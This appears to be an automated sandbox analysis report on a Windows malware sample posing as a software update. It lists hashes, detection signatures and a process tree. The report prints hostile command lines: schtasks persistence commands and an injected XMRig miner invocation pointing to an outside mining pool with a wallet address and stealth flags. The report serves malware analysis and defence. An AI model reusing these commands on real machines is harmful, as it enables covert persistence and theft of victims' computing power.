Analysis

max time kernel: 134s
max time network: 125s
platform: windows10_x64
resource: win10v20210410
submitted: 18-07-2021 23:59

Static task: static1
Behavioral task: behavioral1
Sample: Software updated v2.6.0.exe
Resource: win7v20210408
General

Target: Software updated v2.6.0.exe
Size: 256KB
MD5: 18d05e20731583a22b495d0d1f107c5b
SHA1: 2ced0e3577063ca3613b43661e7df5bc1411ab09
SHA256: b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae
SHA512: 36e73454b0d74088fb39dbec77c45c4106908dc80efc6a0ac8247a538345b4224f3f5e0cf6b39cf8c1687ddcee58ac2e6f24b735c9b9e277c7d064fd82e7a65a
Malware Config
Signatures
- XMRig Miner Payload (3 IoCs)
  Processes:
  resource | yara_rule
  behavioral2/memory/2972-166-0x0000000140000000-0x0000000140758000-memory.dmp | xmrig
  behavioral2/memory/2972-167-0x00000001402EB66C-mapping.dmp | xmrig
  behavioral2/memory/2972-169-0x0000000140000000-0x0000000140758000-memory.dmp | xmrig

- Executes dropped EXE (6 IoCs)
  Processes:
  pid | process
  1968 | xmrmine.exe
  1892 | etcmin.exe
  2912 | serverpatch.exe
  516 | rtksmbs.exe
  2172 | sihost64.exe
  2816 | sihost32.exe

- Legitimate hosting services abused for malware hosting/C2 (1 TTPs)

- Suspicious use of SetThreadContext (1 IoCs)
  Processes:
  description | pid | process | target process
  PID 2912 set thread context of 2972 | 2912 | serverpatch.exe | explorer.exe

- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

- Creates scheduled task(s) (1 TTPs, 4 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  Processes:
  pid | process
  2800 | schtasks.exe
  2756 | schtasks.exe
  3852 | schtasks.exe
  2216 | schtasks.exe

- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  Processes:
  pid | process
  1968 | xmrmine.exe
  1892 | etcmin.exe
  2912 | serverpatch.exe
  516 | rtksmbs.exe

- Suspicious use of AdjustPrivilegeToken (6 IoCs)
  Processes:
  description | pid | process
  Token: SeDebugPrivilege | 1968 | xmrmine.exe
  Token: SeDebugPrivilege | 1892 | etcmin.exe
  Token: SeDebugPrivilege | 2912 | serverpatch.exe
  Token: SeDebugPrivilege | 516 | rtksmbs.exe
  Token: SeLockMemoryPrivilege | 2972 | explorer.exe
  Token: SeLockMemoryPrivilege | 2972 | explorer.exe

- Suspicious use of WriteProcessMemory (43 IoCs)
  Processes:
  description | pid | process | target process
  PID 3956 wrote to memory of 1968 | 3956 | Software updated v2.6.0.exe | xmrmine.exe
  PID 3956 wrote to memory of 1968 | 3956 | Software updated v2.6.0.exe | xmrmine.exe
  PID 3956 wrote to memory of 1892 | 3956 | Software updated v2.6.0.exe | etcmin.exe
  PID 3956 wrote to memory of 1892 | 3956 | Software updated v2.6.0.exe | etcmin.exe
  PID 1892 wrote to memory of 2576 | 1892 | etcmin.exe | cmd.exe
  PID 1892 wrote to memory of 2576 | 1892 | etcmin.exe | cmd.exe
  PID 1968 wrote to memory of 1744 | 1968 | xmrmine.exe | cmd.exe
  PID 1968 wrote to memory of 1744 | 1968 | xmrmine.exe | cmd.exe
  PID 1744 wrote to memory of 2756 | 1744 | cmd.exe | schtasks.exe
  PID 1744 wrote to memory of 2756 | 1744 | cmd.exe | schtasks.exe
  PID 2576 wrote to memory of 2800 | 2576 | cmd.exe | schtasks.exe
  PID 2576 wrote to memory of 2800 | 2576 | cmd.exe | schtasks.exe
  PID 1968 wrote to memory of 2912 | 1968 | xmrmine.exe | serverpatch.exe
  PID 1968 wrote to memory of 2912 | 1968 | xmrmine.exe | serverpatch.exe
  PID 1892 wrote to memory of 516 | 1892 | etcmin.exe | rtksmbs.exe
  PID 1892 wrote to memory of 516 | 1892 | etcmin.exe | rtksmbs.exe
  PID 516 wrote to memory of 1532 | 516 | rtksmbs.exe | cmd.exe
  PID 516 wrote to memory of 1532 | 516 | rtksmbs.exe | cmd.exe
  PID 2912 wrote to memory of 2256 | 2912 | serverpatch.exe | cmd.exe
  PID 2912 wrote to memory of 2256 | 2912 | serverpatch.exe | cmd.exe
  PID 2912 wrote to memory of 2172 | 2912 | serverpatch.exe | sihost64.exe
  PID 2912 wrote to memory of 2172 | 2912 | serverpatch.exe | sihost64.exe
  PID 516 wrote to memory of 2816 | 516 | rtksmbs.exe | sihost32.exe
  PID 516 wrote to memory of 2816 | 516 | rtksmbs.exe | sihost32.exe
  PID 2256 wrote to memory of 3852 | 2256 | cmd.exe | schtasks.exe
  PID 2256 wrote to memory of 3852 | 2256 | cmd.exe | schtasks.exe
  PID 1532 wrote to memory of 2216 | 1532 | cmd.exe | schtasks.exe
  PID 1532 wrote to memory of 2216 | 1532 | cmd.exe | schtasks.exe
  PID 2912 wrote to memory of 2972 | 2912 | serverpatch.exe | explorer.exe
  PID 2912 wrote to memory of 2972 | 2912 | serverpatch.exe | explorer.exe
  PID 2912 wrote to memory of 2972 | 2912 | serverpatch.exe | explorer.exe
  PID 2912 wrote to memory of 2972 | 2912 | serverpatch.exe | explorer.exe
  PID 2912 wrote to memory of 2972 | 2912 | serverpatch.exe | explorer.exe
  PID 2912 wrote to memory of 2972 | 2912 | serverpatch.exe | explorer.exe
  PID 2912 wrote to memory of 2972 | 2912 | serverpatch.exe | explorer.exe
  PID 2912 wrote to memory of 2972 | 2912 | serverpatch.exe | explorer.exe
  PID 2912 wrote to memory of 2972 | 2912 | serverpatch.exe | explorer.exe
  PID 2912 wrote to memory of 2972 | 2912 | serverpatch.exe | explorer.exe
  PID 2912 wrote to memory of 2972 | 2912 | serverpatch.exe | explorer.exe
  PID 2912 wrote to memory of 2972 | 2912 | serverpatch.exe | explorer.exe
  PID 2912 wrote to memory of 2972 | 2912 | serverpatch.exe | explorer.exe
  PID 2912 wrote to memory of 2972 | 2912 | serverpatch.exe | explorer.exe
  PID 2912 wrote to memory of 2972 | 2912 | serverpatch.exe | explorer.exe
  PID 2912 wrote to memory of 2972 | 2912 | serverpatch.exe | explorer.exe
Processes

(Process tree; indentation shows parent/child depth, each entry lists the image path, the command line and the signatures that fired for that process.)

- C:\Users\Admin\AppData\Local\Temp\Software updated v2.6.0.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\Software updated v2.6.0.exe"
  signatures: Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Roaming\xmrmine.exe
    command line: C:\Users\Admin\AppData\Roaming\xmrmine.exe
    signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\System32\cmd.exe
      command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit
      signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\schtasks.exe
        command line: schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'
        signatures: Creates scheduled task(s)
    - C:\Users\Admin\appdata\roaming\serverpatch.exe
      command line: "C:\Users\Admin\appdata\roaming\serverpatch.exe"
      signatures: Executes dropped EXE; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - C:\Windows\System32\cmd.exe
        command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit
        signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\system32\schtasks.exe
          command line: schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'
          signatures: Creates scheduled task(s)
      - C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe
        command line: "C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe"
        signatures: Executes dropped EXE
      - C:\Windows\explorer.exe
        command line: C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=40 --cinit-idle-wait=2 --cinit-idle-cpu=80 --cinit-stealth
        signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Users\Admin\AppData\Roaming\etcmin.exe
    command line: C:\Users\Admin\AppData\Roaming\etcmin.exe
    signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\System32\cmd.exe
      command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit
      signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\schtasks.exe
        command line: schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'
        signatures: Creates scheduled task(s)
    - C:\Users\Admin\appdata\roaming\rtksmbs.exe
      command line: "C:\Users\Admin\appdata\roaming\rtksmbs.exe"
      signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - C:\Windows\System32\cmd.exe
        command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit
        signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\system32\schtasks.exe
          command line: schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'
          signatures: Creates scheduled task(s)
      - C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe
        command line: "C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe"
        signatures: Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads